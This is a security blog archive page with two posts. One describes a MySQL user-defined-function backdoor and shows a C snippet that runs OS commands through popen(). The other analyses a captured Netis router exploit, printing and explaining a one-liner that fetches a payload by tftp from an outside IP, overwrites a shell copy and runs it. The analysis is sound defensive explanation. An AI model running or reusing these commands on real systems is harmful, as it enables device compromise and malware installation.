neonprimetime security , just trying to help: Backdoor

Friday, September 16, 2016

MySQL Backdoors in UDFs

Thought this blog by securusglobal about MySQL Backdoor with udf was interesting. In Short, a UDF is a user-defined-function in MySQL. In general you can use it to manipulate column values for example in a select statement without having to put the dirty non-Mysql logic (such as C/C++) inside the actual select statement. Example: select udf_tocelsius(temps.fahrenheit) from temps

But instead of doing some nice like a formula or calculation, as a bad guy you could perhaps do something like

char *cmd;
FILE *fp;
strcat(cmd, args->args[i]);
fp = popen(cmd, "r");

Which is C code that essentially runs systems commands (similar to the system() function) against the operating system, so you could pass in commands that download your malware, execute it, etc.

Please note this is not a vulnerability, this is more of just an example of a backdoor persistence method. Of course a lot of things have to be setup correctly for this to even work, so for example if the attacker didn't have appropriate access or permissions were locked down tight, this might never even work. But interesting though none-the-less.

More about neonprimetime

Top Blogs of all-time

Top Github Contributions

Qualys Scantronitor 2.0

Friday, August 5, 2016

Netis Router Backdoor UDP 53413

I saw this SANS Internet Storm Center post about Netis Router Backdoor exploit attempts. Thought it'd be interesting to take a quick look at one of them. It's a raw UDP packet sent to port 53413 with a shell command to be executed. Looks very similar to all those Shellshock attempts you continue to see in your logs.

cd /tmp || cd /var/ || cd /dev/;busybox tftp -r min -g 91.134.141.49;cp /bin/sh .;cat min >sh;chmod 777 sh;./sh.

So first ...

cd /tmp || cd /var/ || cd /dev/;

The first thing the attacker tries it to move into a directory where he likely has read/write permissions. Thus he uses the double-pipe (||) to so that if the first command fails, the second command is executed, and if that one fails, the third is executed. Thus it's essentially an if this command works do it, otherwise try the next, otherwise try the next. So he sees if he has permission to move into the /tmp folder or the /var folder or the /dev folder. If he moves into any of those folders then he's ready to execute the more interesting commands.

Then

busybox tftp -r min -g 91.134.141.49;

Next the user is taking advantage of busybox, which is a tool that is on many embedded linux devices (likely the Netis Router that is exploitable) and this tool has many basic linux commands/functions such as tftp.

tftp [OPTIONS] HOST [PORT]

Transfer a file from/to tftp server

Options:

-r FILE Remote FILE
-g Get file

So the attacker is using the tftp command to get a remote file called 'min', in this case from the server at 91.134.141.49 and save it to the current directory (again this could be /tmp, /var, or /dev depending on the first command excecuted).

Then

cp /bin/sh .;

Next the user makes a copy of the shell executable to the current directory (again this could be /tmp, /var, or /dev depending on the first command excecuted).

Then

cat min >sh;

Next the attacker appears to concatenate the contents of the downloaded file to the end of the sh executable, thus when the sh executable is run it will run not only the standard commands but also the ones the attacker appended to it.

Then

chmod 777 sh;

Then the sh permissions are changed so that the attacker is able to execute them.

Then

./sh.

Finally the attacker executes the sh executable which includes his downloaded payload and your server is likely now compromised.

To prevent this I'm not sure that I've seen anything about Netis actually patching it so you probably need some sort of IPS (Intrusion Prevention System) that has a signature match that can block this type of traffic.

More about neonprimetime

Top Blogs of all-time

Top Github Contributions

Qualys Scantronitor 2.0